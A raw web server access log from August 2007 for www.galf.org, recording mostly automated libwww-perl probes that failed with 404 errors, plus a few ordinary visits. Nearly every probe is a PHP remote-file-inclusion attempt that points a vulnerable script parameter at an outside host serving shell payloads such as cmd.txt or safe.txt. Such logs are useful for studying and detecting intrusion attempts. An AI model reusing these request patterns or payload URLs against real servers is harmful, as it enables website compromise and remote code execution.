217.110.144.106 - - [27/Aug/2007:15:11:31 -0700] "GET /logs/access_070618.log/modules/4nAlbum/public/displayCategory.php?basepath=http://www.teleparts.de/faq/inc/control.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
88.84.143.170 - - [27/Aug/2007:15:11:38 -0700] "GET /logs/index.php?include=http://bhnofoco.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
88.84.143.170 - - [27/Aug/2007:15:11:38 -0700] "GET /index.php?include=http://bhnofoco.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.97.20.22 - - [27/Aug/2007:15:11:48 -0700] "GET /logs/access_070716.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.97.20.22 - - [27/Aug/2007:15:11:48 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.97.20.22 - - [27/Aug/2007:15:11:50 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.205.80.54 - - [27/Aug/2007:15:11:58 -0700] "GET /logs/index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
193.205.80.54 - - [27/Aug/2007:15:11:58 -0700] "GET /index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
217.110.144.106 - - [27/Aug/2007:15:12:31 -0700] "GET /logs/modules/4nAlbum/public/displayCategory.php?basepath=http://www.teleparts.de/faq/inc/control.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
193.205.80.54 - - [27/Aug/2007:15:13:12 -0700] "GET /logs/access_070716.log/index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
193.205.80.54 - - [27/Aug/2007:15:13:16 -0700] "GET /logs/access.log/index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
88.84.143.170 - - [27/Aug/2007:15:14:56 -0700] "GET /logs/index2.php?x=http://bhnofoco.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
88.84.143.170 - - [27/Aug/2007:15:14:56 -0700] "GET /index2.php?x=http://bhnofoco.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.237.200.81 - - [27/Aug/2007:15:14:58 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.radioroedovre.dk//oneadmin/_files/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
80.237.200.81 - - [27/Aug/2007:15:14:58 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.radioroedovre.dk//oneadmin/_files/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
72.232.248.226 - - [27/Aug/2007:15:15:05 -0700] "GET /logs/access.log///modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://cirrus.unbc.ca/anniversary/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.17.17.82 - - [27/Aug/2007:15:16:33 -0700] "GET /logs/access.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.annabelles.de//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
217.17.17.82 - - [27/Aug/2007:15:16:34 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.annabelles.de//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
217.17.17.82 - - [27/Aug/2007:15:16:34 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.annabelles.de//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
201.232.142.227 - - [27/Aug/2007:15:17:35 -0700] "GET / HTTP/1.1" 200 1048 "http://www.google.com.co/search?hl=es&q=lesbianas&meta=lr%3Dlang_en" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "www.galf.org"
201.232.142.227 - - [27/Aug/2007:15:17:37 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "www.galf.org"
201.232.142.227 - - [27/Aug/2007:15:17:37 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Google Desktop)" "www.galf.org"
201.232.142.227 - - [27/Aug/2007:15:17:37 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "www.galf.org"
88.84.143.170 - - [27/Aug/2007:15:18:54 -0700] "GET /logs/index2.php?content=http://bhnofoco.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
88.84.143.170 - - [27/Aug/2007:15:18:54 -0700] "GET /index2.php?content=http://bhnofoco.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.204.17.137 - - [27/Aug/2007:15:25:45 -0700] "GET /logs/access_070813.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.74.151.80 - - [27/Aug/2007:15:29:58 -0700] "GET /logs/index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.74.151.80 - - [27/Aug/2007:15:29:59 -0700] "GET /index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.110.144.106 - - [27/Aug/2007:15:30:01 -0700] "GET /logs/access_070716.log/modules/4nAlbum/public/displayCategory.php?basepath=http://www.teleparts.de/faq/inc/control.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
80.74.151.80 - - [27/Aug/2007:15:30:57 -0700] "GET /logs/access_070716.log/index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
80.74.151.80 - - [27/Aug/2007:15:31:01 -0700] "GET /logs/access.log/index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
82.73.66.165 - - [27/Aug/2007:15:33:05 -0700] "GET /logs/access_070618.log/wordtube/wordtube-button.php?wpPATH=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.73.66.165 - - [27/Aug/2007:15:33:06 -0700] "GET /wordtube/wordtube-button.php?wpPATH=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.73.66.165 - - [27/Aug/2007:15:33:06 -0700] "GET /logs/wordtube/wordtube-button.php?wpPATH=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.73.66.165 - - [27/Aug/2007:15:33:17 -0700] "GET /logs/access_070611.log/wordtube/wordtube-button.php?wpPATH=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
72.29.75.63 - - [27/Aug/2007:15:33:44 -0700] "GET /start.php?pag=http://www.dark-nation.com/the_abyss/httpd? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
82.73.66.165 - - [27/Aug/2007:15:34:14 -0700] "GET /logs/access_070618.log/wordtube/wordtube-button.php?wpPATH=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.73.66.165 - - [27/Aug/2007:15:34:14 -0700] "GET /wordtube/wordtube-button.php?wpPATH=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.73.66.165 - - [27/Aug/2007:15:34:15 -0700] "GET /logs/wordtube/wordtube-button.php?wpPATH=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.140.18.71 - - [27/Aug/2007:15:34:25 -0700] "GET /wordtube/wordtube-button.php?wpPATH=http://mr-general.net/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
203.192.130.34 - - [27/Aug/2007:15:34:47 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://jodoh-crew.org/cmdmic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
203.192.130.34 - - [27/Aug/2007:15:34:47 -0700] "GET /modules/My_eGallery/index.php?basepath=http://jodoh-crew.org/cmdmic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
152.81.144.22 - - [27/Aug/2007:15:35:24 -0700] "GET /logs/access_070716.log/sohoadmin/program/includes/shared_functions.php?_SESSION[docroot_path]=http://www.corvettefreak.nl/forums/style_images/bluepastel/folder_team_icons/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
152.81.144.22 - - [27/Aug/2007:15:35:25 -0700] "GET /sohoadmin/program/includes/shared_functions.php?_SESSION[docroot_path]=http://www.corvettefreak.nl/forums/style_images/bluepastel/folder_team_icons/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
152.81.144.22 - - [27/Aug/2007:15:35:25 -0700] "GET /logs/sohoadmin/program/includes/shared_functions.php?_SESSION[docroot_path]=http://www.corvettefreak.nl/forums/style_images/bluepastel/folder_team_icons/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
152.81.144.22 - - [27/Aug/2007:15:35:39 -0700] "GET /logs/access.log/sohoadmin/program/includes/shared_functions.php?_SESSION[docroot_path]=http://www.corvettefreak.nl/forums/style_images/bluepastel/folder_team_icons/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
82.73.66.165 - - [27/Aug/2007:15:35:44 -0700] "GET /logs/access_070611.log/wordtube/wordtube-button.php?wpPATH=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.170.240.140 - - [27/Aug/2007:15:36:00 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://humszolg.hu/html/g.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.170.240.140 - - [27/Aug/2007:15:36:01 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://humszolg.hu/html/g.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
220.95.230.123 - - [27/Aug/2007:15:36:07 -0700] "GET /logs/access.log//components/com_rsgallery/rsgallery.html.php=http://br.geocities.com/jccoutinhojrpvh/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
220.95.230.123 - - [27/Aug/2007:15:36:07 -0700] "GET //components/com_rsgallery/rsgallery.html.php=http://br.geocities.com/jccoutinhojrpvh/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
220.95.230.123 - - [27/Aug/2007:15:36:08 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php=http://br.geocities.com/jccoutinhojrpvh/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
220.95.230.123 - - [27/Aug/2007:15:36:34 -0700] "GET /logs/access_070716.log//components/com_rsgallery/rsgallery.html.php=http://br.geocities.com/jccoutinhojrpvh/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.170.240.140 - - [27/Aug/2007:15:36:50 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.170.240.140 - - [27/Aug/2007:15:36:50 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.214.144 - - [27/Aug/2007:15:37:39 -0700] "GET /wordtube/wordtube-button.php?wpPATH=http://mr-general.net/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
203.192.130.34 - - [27/Aug/2007:15:39:30 -0700] "GET /logs/wordtube/wordtube-button.php?wpPATH=http://jodoh-crew.org/cmdmic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
203.192.130.34 - - [27/Aug/2007:15:39:31 -0700] "GET /wordtube/wordtube-button.php?wpPATH=http://jodoh-crew.org/cmdmic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
203.192.130.34 - - [27/Aug/2007:15:41:34 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://jodoh-crew.org/cmdmic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
203.192.130.34 - - [27/Aug/2007:15:41:34 -0700] "GET /modules/My_eGallery/index.php?basepath=http://jodoh-crew.org/cmdmic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:15:41:48 -0700] "GET /logs/access_070813.log/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:15:41:48 -0700] "GET /administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:15:41:48 -0700] "GET /logs/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:15:41:49 -0700] "GET /logs/access.log/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:15:42:25 -0700] "GET /logs/access_070813.log/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://www.7uh.com/gallery2/help? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:15:42:26 -0700] "GET /administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://www.7uh.com/gallery2/help? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
212.241.213.165 - - [27/Aug/2007:15:42:26 -0700] "GET /logs/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://www.7uh.com/gallery2/help? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:15:42:27 -0700] "GET /logs/access.log/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://www.7uh.com/gallery2/help? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
212.241.213.165 - - [27/Aug/2007:15:43:14 -0700] "GET /logs/access_070813.log/components/com_lmo/lmo.php?mosConfig_absolute_path=http://bubblefishhosting.nl/images/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:15:43:14 -0700] "GET /components/com_lmo/lmo.php?mosConfig_absolute_path=http://bubblefishhosting.nl/images/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:15:43:15 -0700] "GET /logs/components/com_lmo/lmo.php?mosConfig_absolute_path=http://bubblefishhosting.nl/images/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:15:43:21 -0700] "GET /logs/access_070813.log/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://bubblefishhosting.nl/images/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:15:43:22 -0700] "GET /administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://bubblefishhosting.nl/images/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:15:43:22 -0700] "GET /logs/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://bubblefishhosting.nl/images/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:15:43:23 -0700] "GET /logs/access.log/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://bubblefishhosting.nl/images/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:15:43:46 -0700] "GET /logs/access_070813.log/components/com_lmo/lmo.php?mosConfig_absolute_path=http://www.7uh.com/gallery2/help? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
212.241.213.165 - - [27/Aug/2007:15:43:46 -0700] "GET /components/com_lmo/lmo.php?mosConfig_absolute_path=http://www.7uh.com/gallery2/help? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
212.241.213.165 - - [27/Aug/2007:15:43:47 -0700] "GET /logs/components/com_lmo/lmo.php?mosConfig_absolute_path=http://www.7uh.com/gallery2/help? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
212.241.213.165 - - [27/Aug/2007:15:43:50 -0700] "GET /logs/access_070813.log/components/com_lmo/lmo.php?mosConfig_absolute_path=http://www.7uh.com/gallery2/help? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
212.241.213.165 - - [27/Aug/2007:15:43:50 -0700] "GET /logs/access_070813.log/components/com_lmo/lmo.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:15:43:50 -0700] "GET /components/com_lmo/lmo.php?mosConfig_absolute_path=http://www.7uh.com/gallery2/help? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:15:43:50 -0700] "GET /components/com_lmo/lmo.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:15:43:50 -0700] "GET /logs/components/com_lmo/lmo.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:15:43:50 -0700] "GET /logs/components/com_lmo/lmo.php?mosConfig_absolute_path=http://www.7uh.com/gallery2/help? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
212.241.213.165 - - [27/Aug/2007:15:44:07 -0700] "GET /logs/access_070813.log/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://www.7uh.com/gallery2/help? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
212.241.213.165 - - [27/Aug/2007:15:44:08 -0700] "GET /administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://www.7uh.com/gallery2/help? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:15:44:08 -0700] "GET /logs/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://www.7uh.com/gallery2/help? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:15:44:08 -0700] "GET /logs/access.log/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://www.7uh.com/gallery2/help? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
212.241.213.165 - - [27/Aug/2007:15:45:05 -0700] "GET /logs/access_070813.log/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://bubblefishhosting.nl/images/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:15:45:06 -0700] "GET /administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://bubblefishhosting.nl/images/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:15:45:06 -0700] "GET /logs/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://bubblefishhosting.nl/images/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:15:45:06 -0700] "GET /logs/access.log/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://bubblefishhosting.nl/images/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
212.241.213.165 - - [27/Aug/2007:15:45:27 -0700] "GET /logs/access_070813.log/components/com_lmo/lmo.php?mosConfig_absolute_path=http://bubblefishhosting.nl/images/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:15:45:28 -0700] "GET /components/com_lmo/lmo.php?mosConfig_absolute_path=http://bubblefishhosting.nl/images/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:15:45:28 -0700] "GET /logs/components/com_lmo/lmo.php?mosConfig_absolute_path=http://bubblefishhosting.nl/images/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
220.227.138.210 - - [27/Aug/2007:15:45:51 -0700] "GET /modules/My_eGallery/index.php?basepath=http://happy.freeweb7.com/smile30.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
220.227.138.210 - - [27/Aug/2007:15:46:47 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://happy.freeweb7.com/smile30.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.25.165.16 - - [27/Aug/2007:15:51:53 -0700] "GET /logs//administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.25.165.16 - - [27/Aug/2007:15:51:53 -0700] "GET //administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.25.165.16 - - [27/Aug/2007:15:51:53 -0700] "GET /logs//administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.25.165.16 - - [27/Aug/2007:15:51:53 -0700] "GET //administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.17.17.82 - - [27/Aug/2007:15:53:51 -0700] "GET /logs/wordtube/wordtube-button.php?wpPATH=http://www.annabelles.de//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
217.17.17.82 - - [27/Aug/2007:15:53:52 -0700] "GET /wordtube/wordtube-button.php?wpPATH=http://www.annabelles.de//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
220.227.138.210 - - [27/Aug/2007:15:55:22 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://happy.freeweb7.com/smile29.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
220.227.138.210 - - [27/Aug/2007:15:55:23 -0700] "GET /modules/My_eGallery/index.php?basepath=http://happy.freeweb7.com/smile29.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
220.227.138.210 - - [27/Aug/2007:15:55:23 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://happy.freeweb7.com/smile29.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.20.65.213 - - [27/Aug/2007:15:56:40 -0700] "GET /logs/admin_modules/admin_module_deldir.inc.php?config[path_src_include]=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.20.65.213 - - [27/Aug/2007:15:56:40 -0700] "GET /admin_modules/admin_module_deldir.inc.php?config[path_src_include]=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
82.73.66.165 - - [27/Aug/2007:15:56:52 -0700] "GET /logs/wordtube/wordtube-button.php?wpPATH=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.73.66.165 - - [27/Aug/2007:15:56:52 -0700] "GET /wordtube/wordtube-button.php?wpPATH=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
220.227.138.210 - - [27/Aug/2007:15:57:07 -0700] "GET /logs/access_070618.log/modules/My_eGallery/index.php?basepath=http://happy.freeweb7.com/smile29.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
128.180.53.19 - - [27/Aug/2007:15:58:31 -0700] "GET /logs/wordtube/wordtube-button.php?wpPATH=http://www.annabelles.de//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
